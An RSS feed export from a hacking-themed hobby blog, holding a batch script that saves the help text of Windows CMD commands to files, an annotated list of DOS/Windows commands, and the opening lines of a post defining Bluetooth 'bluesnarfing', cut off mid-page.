<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>HACKING WITH ME</title><description>A GUIDE TO HARMLESS HACKING WITHOUT BREAKING THE LAW.</description><managingEditor>noreply@blogger.com (Gobind sharma)</managingEditor><pubDate>Sun, 1 Sep 2024 14:26:55 +0530</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">14</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://hackingwithme.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>A GUIDE TO HARMLESS HACKING WITHOUT BREAKING THE LAW.</itunes:subtitle><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><title>Learn CMD commands in a new way..</title><link>http://hackingwithme.blogspot.com/2009/04/learn-cmd-commands-in-new-way.html</link><category>MS Dos</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Sat, 4 Apr 2009 18:22:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-7069042727600829525</guid><description>&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande'; font-size: 13px; line-height: 16px; "&gt;Copy and paste the following code in notepad and save it as &lt;span class="Apple-style-span" style="color: rgb(255, 0, 0); "&gt;lecture.bat&lt;/span&gt; click to learn cmd commands.this will create notepads in ur D:\ drive which will contain explanation of various commands.&lt;br /&gt;&lt;br /&gt;c:&lt;br /&gt;copy/? &gt;d:\copy.txt&lt;br /&gt;dir/? &gt;d:\dir.txt&lt;br /&gt;rmdir/? &gt;d:\rmdir.txt&lt;br /&gt;format/? &gt;d:\format.txt&lt;br /&gt;diskpart/? &gt;d:\diskpart.txt&lt;br /&gt;tree/? &gt;d:\tree.txt&lt;br /&gt;telnet/? &gt;d:\telnet.txt&lt;br /&gt;time/? &gt;d:\time.txt&lt;br /&gt;net user/? &gt;d:\netuser.txt&lt;br /&gt;del/? &gt;d:\del.txt&lt;br /&gt;attrib/? &gt;d:\attrib.txt&lt;br /&gt;shutdown/? &gt;d:\shutdown.txt&lt;br /&gt;color/? &gt;d:\color.txt&lt;br /&gt;echo/? &gt;d:\echo.txt&lt;br /&gt;type/? &gt;d:\type.txt&lt;br /&gt;ipconfig/? &gt;d:\ipconfig.txt&lt;br /&gt;ipconfig/all/? &gt;d:\ipconfigall.txt&lt;br /&gt;netstat/? &gt;d:\netstat.txt&lt;br /&gt;nbstat/? &gt;d:\nbstat.txt&lt;br /&gt;netview/? &gt;d:\netview.txt&lt;br /&gt;ping/? &gt;d:\ping.txt&lt;br /&gt;chkdsk/? &gt;d:\chkdsk.txt&lt;br /&gt;ver/? &gt;d:\ver.txt&lt;br /&gt;cd/? &gt;d:\cd.txt&lt;br /&gt;net/? &gt;d:\net.txt&lt;br /&gt;fsutil/? &gt;d:\fsutil.txt&lt;br /&gt;erase/? &gt;d:\erase.txt&lt;br /&gt;tracert/? &gt;d:\tracert.txt&lt;br /&gt;bootcfg/? &gt;d:\bootcfg.txt&lt;br /&gt;driverquery/? &gt;d:\driverquery.txt&lt;br /&gt;getmac/? &gt;d:\getmac.txt&lt;br /&gt;netsh/? &gt;d:\netsh.txt&lt;br /&gt;systeminfo/? &gt;d:\systeminfo.txt&lt;br /&gt;print/? &gt;d:\print.txt&lt;br /&gt;prompt/? &gt;d:\prompt.txt&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>All Dos Commands</title><link>http://hackingwithme.blogspot.com/2009/04/all-dos-commands.html</link><category>MS Dos</category><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Sat, 4 Apr 2009 18:21:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-996974868332854271</guid><description>&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande'; font-size: 12px; "&gt;&lt;p class="MsoNormal" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: left; font-size: 1em; line-height: normal; margin-bottom: 0.0001pt; "&gt;&lt;span style="font-size: 10.5pt; font-family: Arial, sans-serif; color: rgb(192, 80, 77); "&gt;ADDUSERS&lt;/span&gt;&lt;span style="font-size: 10.5pt; font-family: Arial, sans-serif; "&gt; Add or list users to/from a CSV file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ARP&lt;/span&gt; Address Resolution Protocol&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ASSOC&lt;/span&gt; Change file extension associations&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ASSOCIAT&lt;/span&gt; One step file association&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;AT &lt;/span&gt;Schedule a command to run at a later time&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ATTRIB&lt;/span&gt; Change file attributes&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;BOOTCFG&lt;/span&gt; Edit Windows boot settings&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;BROWSTAT&lt;/span&gt; Get domain, browser and PDC info&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CACLS&lt;/span&gt; Change file permissions&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CALL&lt;/span&gt; Call one batch program from another&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CD&lt;/span&gt; Change Directory - move to a specific Folder&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CHANGE&lt;/span&gt; Change Terminal Server Session properties&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CHKDSK&lt;/span&gt; Check Disk - check and repair disk problems&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CHKNTFS&lt;/span&gt; Check the NTFS file system&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CHOICE&lt;/span&gt; Accept keyboard input to a batch file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CIPHER&lt;/span&gt; Encrypt or Decrypt files/folders&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CleanMgr&lt;/span&gt; Automated cleanup of Temp files, recycle bin&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CLEARMEM&lt;/span&gt; Clear memory leaks&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CLIP&lt;/span&gt; Copy STDIN to the Windows clipboard.&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CLS&lt;/span&gt; Clear the screen&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CLUSTER&lt;/span&gt; Windows Clustering&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CMD&lt;/span&gt; Start a new CMD shell&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;COLOR&lt;/span&gt; Change colors of the CMD window&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;COMP&lt;/span&gt; Compare the contents of two files or sets of files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;COMPACT&lt;/span&gt; Compress files or folders on an NTFS partition&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;COMPRESS&lt;/span&gt; Compress individual files on an NTFS partition&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CON2PRT&lt;/span&gt; Connect or disconnect a Printer&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CONVERT&lt;/span&gt; Convert a FAT drive to NTFS.&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;COPY&lt;/span&gt; Copy one or more files to another location&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;CSVDE&lt;/span&gt; Import or Export Active Directory data&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DATE&lt;/span&gt; Display or set the date&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;Dcomcnfg&lt;/span&gt; DCOM Configuration Utility&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DEFRAG&lt;/span&gt; Defragment hard drive&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DEL&lt;/span&gt; Delete one or more files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DELPROF&lt;/span&gt; Delete NT user profiles&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DELTREE&lt;/span&gt; Delete a folder and all subfolders&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DevCon&lt;/span&gt; Device Manager Command Line Utility&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DIR&lt;/span&gt; Display a list of files and folders&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DIRUSE&lt;/span&gt; Display disk usage&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DISKCOMP&lt;/span&gt; Compare the contents of two floppy disks&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DISKCOPY&lt;/span&gt; Copy the contents of one floppy disk to another&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DNSSTAT&lt;/span&gt; DNS Statistics&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DOSKEY&lt;/span&gt; Edit command line, recall commands, and create macros&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DSADD&lt;/span&gt; Add user (computer, group..) to active directory&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DSQUERY&lt;/span&gt; List items in active directory&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;DSMOD&lt;/span&gt; Modify user (computer, group..) in active directory&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ECHO&lt;/span&gt; Display message on screen&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ENDLOCAL&lt;/span&gt; End localisation of environment changes in a batch file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ERASE&lt;/span&gt; Delete one or more files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;EXIT&lt;/span&gt; Quit the CMD shell&lt;span class="Apple-style-span" style="font-family: Georgia; font-size: 16px; "&gt;&lt;span style="font-size: 10.5pt; font-family: Arial, sans-serif; color: rgb(192, 80, 77); "&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: left; font-size: 1em; line-height: normal; margin-bottom: 0.0001pt; "&gt;&lt;span style="font-size: 10.5pt; font-family: Arial, sans-serif; "&gt;&lt;span class="Apple-style-span" style="font-family: Georgia; font-size: 16px; "&gt;&lt;span style="font-size: 10.5pt; font-family: Arial, sans-serif; color: rgb(192, 80, 77); "&gt;EXPAND&lt;/span&gt;&lt;span style="font-size: 10.5pt; font-family: Arial, sans-serif; "&gt; Uncompress files&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal" style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; text-align: left; font-size: 1em; line-height: normal; margin-bottom: 0.0001pt; "&gt;&lt;span style="font-size: 10.5pt; font-family: Arial, sans-serif; "&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;EXTRACT&lt;/span&gt; Uncompress CAB files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FC&lt;/span&gt; Compare two files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FDISK&lt;/span&gt; Disk Format and partition&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FIND&lt;/span&gt; Search for a text string in a file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FINDSTR&lt;/span&gt; Search for strings in files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FOR&lt;/span&gt; Conditionally perform a command several times&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FORFILES&lt;/span&gt; Batch process multiple files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FORMAT&lt;/span&gt; Format a disk&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FREEDISK&lt;/span&gt; Check free disk space (in bytes)&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FSUTIL&lt;/span&gt; File and Volume utilities&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FTP&lt;/span&gt; File Transfer Protocol&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;FTYPE&lt;/span&gt; Display or modify file types used in file extension associations&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;GLOBA&lt;/span&gt;L Display membership of global groups&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;GOTO&lt;/span&gt; Direct a batch program to jump to a labelled line&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;HELP&lt;/span&gt; Online Help&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;HFNETCHK &lt;/span&gt;Network Security Hotfix Checker&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;IF&lt;/span&gt; Conditionally perform a command&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;IFMEMBER&lt;/span&gt; Is the current user in an NT Workgroup&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;IPCONFIG&lt;/span&gt; Configure IP&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;KILL&lt;/span&gt; Remove a program from memory&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;LABEL&lt;/span&gt; Edit a disk label&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;LOCAL&lt;/span&gt; Display membership of local groups&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;LOGEVEN&lt;/span&gt;T Write text to the NT event viewer.&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;LOGOFF&lt;/span&gt; Log a user off&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;LOGTIME&lt;/span&gt; Log the date and time in a file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MAPISEND&lt;/span&gt; Send email from the command line&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MEM&lt;/span&gt; Display memory usage&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MD&lt;/span&gt; Create new folders&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MODE&lt;/span&gt; Configure a system device&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MORE&lt;/span&gt; Display output, one screen at a time&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MOUNTVOL&lt;/span&gt; Manage a volume mount point&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MOVE&lt;/span&gt; Move files from one folder to another&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MOVEUSER&lt;/span&gt; Move a user from one domain to another&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MSG &lt;/span&gt;Send a message&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MSIEXEC&lt;/span&gt; Microsoft Windows Installer&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MSINFO&lt;/span&gt; Windows NT diagnostics&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MSTSC&lt;/span&gt; Terminal Server Connection (Remote Desktop Protocol)&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MUNGE&lt;/span&gt; Find and Replace text within file(s)&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;MV&lt;/span&gt; Copy in-use files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NET&lt;/span&gt; Manage network resources&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NETDOM&lt;/span&gt; Domain Manager&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NETSH&lt;/span&gt; Configure network protocols&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NETSVC&lt;/span&gt; Command-line Service Controller&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NBTSTAT&lt;/span&gt; Display networking statistics (NetBIOS over TCP/IP)&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NETSTAT&lt;/span&gt; Display networking statistics (TCP/IP)&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NOW&lt;/span&gt; Display the current Date and Time&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NSLOOKUP&lt;/span&gt; Name server lookup&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NTBACKUP&lt;/span&gt; Backup folders to tape&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;NTRIGHTS&lt;/span&gt; Edit user account rights&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PATH &lt;/span&gt;Display or set a search path for executable files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PATHPING&lt;/span&gt; Trace route plus network latency and packet loss&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PAUSE&lt;/span&gt; Suspend processing of a batch file and display a message&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style="font-size: 10.5pt; line-height: 16px; font-family: Arial, sans-serif; color: rgb(192, 80, 77); "&gt;PERMS&lt;/span&gt;&lt;span style="font-size: 10.5pt; line-height: 16px; font-family: Arial, sans-serif; "&gt; Show permissions for a user&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PERFMON&lt;/span&gt; Performance Monitor&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PING &lt;/span&gt;Test a network connection&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;POPD&lt;/span&gt; Restore the previous value of the current directory saved by PUSHD&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PORTQRY&lt;/span&gt; Display the status of ports and services&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PRINT&lt;/span&gt; Print a text file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PRNCNFG&lt;/span&gt; Display, configure or rename a printer&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PRNMNGR&lt;/span&gt; Add, delete, list printers set the default printer&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PROMPT&lt;/span&gt; Change the command prompt&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsExec &lt;/span&gt;Execute process remotely&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsFile&lt;/span&gt; Show files opened remotely&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsGetSid &lt;/span&gt;Display the SID of a computer or a user&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsInfo&lt;/span&gt; List information about a system&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsKill &lt;/span&gt;Kill processes by name or process ID&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsList&lt;/span&gt; List detailed information about processes&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsLoggedOn&lt;/span&gt; Who's logged on (locally or via resource sharing)&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsLogList&lt;/span&gt; Event log records&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsPasswd&lt;/span&gt; Change account password&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsService&lt;/span&gt; View and control services&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsShutdown&lt;/span&gt; Shutdown or reboot a computer&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PsSuspend&lt;/span&gt; Suspend processes&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;PUSHD&lt;/span&gt; Save and then change the current directory&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;QGREP &lt;/span&gt;Search file(s) for lines that match a given pattern.&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;RASDIAL&lt;/span&gt; Manage RAS connections&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;RASPHONE&lt;/span&gt; Manage RAS connections&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;RECOVER&lt;/span&gt; Recover a damaged file from a defective disk.&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;REG&lt;/span&gt; Read, Set or Delete registry keys and values&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;REGEDIT&lt;/span&gt; Import or export registry settings&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;REGSVR32&lt;/span&gt; Register or unregister a DLL&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;REGINI&lt;/span&gt; Change Registry Permissions&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;REM&lt;/span&gt; Record comments (remarks) in a batch file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;REN &lt;/span&gt;Rename a file or files.&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;REPLACE&lt;/span&gt; Replace or update one file with another&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;RD&lt;/span&gt; Delete folder(s)&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;RDISK&lt;/span&gt; Create a Recovery Disk&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;RMTSHARE&lt;/span&gt; Share a folder or a printer&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ROBOCOPY&lt;/span&gt; Robust File and Folder Copy&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ROUTE &lt;/span&gt;Manipulate network routing tables&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;RUNAS &lt;/span&gt;Execute a program under a different user account&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;RUNDLL32 &lt;/span&gt;Run a DLL command (add/remove print connections)&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SC&lt;/span&gt; Service Control&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SCHTASKS&lt;/span&gt; Create or Edit Scheduled Tasks&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SCLIST&lt;/span&gt; Display NT Services&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;ScriptIt&lt;/span&gt; Control GUI applications&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SET&lt;/span&gt; Display, set, or remove environment variables&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SETLOCAL&lt;/span&gt; Begin localisation of environment changes in a batch file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SETX&lt;/span&gt; Set environment variables permanently&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SHARE&lt;/span&gt; List or edit a file share or print share&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SHIFT&lt;/span&gt; Shift the position of replaceable parameters in a batch file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SHORTCUT&lt;/span&gt; Create a windows shortcut (.LNK file)&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SHOWGRPS&lt;/span&gt; List the NT Workgroups a user has joined&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SHOWMBRS&lt;/span&gt; List the Users who are members of a Workgroup&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SHUTDOWN&lt;/span&gt; Shutdown the computer&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SLEEP &lt;/span&gt;Wait for x seconds&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SOON&lt;/span&gt; Schedule a command to run in the near future&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SORT&lt;/span&gt; Sort input&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;START&lt;/span&gt; Start a separate window to run a specified program or command&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SU&lt;/span&gt; Switch User&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SUBINACL&lt;/span&gt; Edit file and folder Permissions, Ownership and Domain&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SUBST&lt;/span&gt; Associate a path with a drive letter&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;SYSTEMINFO&lt;/span&gt; List system configuration&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;TASKLIST&lt;/span&gt; List running applications and services&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;TIME&lt;/span&gt; Display or set the system time&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;TIMEOUT&lt;/span&gt; Delay processing of a batch file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;TITLE&lt;/span&gt; Set the window title for a CMD.EXE session&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;TOUCH&lt;/span&gt; Change file timestamps&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;TRACERT&lt;/span&gt; Trace route to a remote host&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;TREE&lt;/span&gt; Graphical display of folder structure&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;TYPE&lt;/span&gt; Display the contents of a text file&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;USRSTAT&lt;/span&gt; List domain usernames and last login&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;VER&lt;/span&gt; Display version information&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;VERIFY&lt;/span&gt; Verify that files have been saved&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;VOL&lt;/span&gt; Display a disk label&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;WHERE &lt;/span&gt;Locate and display files in a directory tree&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;WHOAMI&lt;/span&gt; Output the current UserName and domain&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;WINDIFF&lt;/span&gt; Compare the contents of two files or sets of files&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;WINMSD&lt;/span&gt; Windows system diagnostics&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;WINMSDP&lt;/span&gt; Windows system diagnostics II&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;WMIC WMI&lt;/span&gt; Commands&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;XCACLS &lt;/span&gt;Change file permissions&lt;br /&gt;&lt;span style="color: rgb(192, 80, 77); "&gt;XCOPY&lt;/span&gt; Copy files and folders&lt;/span&gt;&lt;/span&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><title>BLUETOOTH HACKING</title><link>http://hackingwithme.blogspot.com/2009/04/bluetooth-hacking.html</link><author>noreply@blogger.com (Gobind sharma)</author><pubDate>Fri, 3 Apr 2009 23:02:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5739182324890807344.post-7150524397651944106</guid><description>&lt;span class="Apple-style-span" style="font-family: Tahoma; color: rgb(80, 73, 69); font-size: 13px; line-height: 20px; "&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;Bluetooth  is wireless technology of data and voice. It requires very low power .It has range from  10m-100m.It can transfer upto 1Mb/s of data.&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 'century gothic', verdana, sans-serif; font-size: 13px; "&gt;&lt;strong&gt;What is blue-tooth hacking ?&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Blue-tooth hacking&lt;/strong&gt; is hacking the other device without the knowing that device.It is also know as Bluesnarfing. &lt;strong&gt;Blue-tooth&lt;/strong&gt; hacking not only limited to cell phones ,but it can also hacked the desktop computers ,LAP’s .&lt;/p&gt;&lt;p style="margin-top: 5px; margin-right: 5px; margin-bottom: 5px; margin-left: 5px; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; font-family: Tahoma, Georgia, Arial, 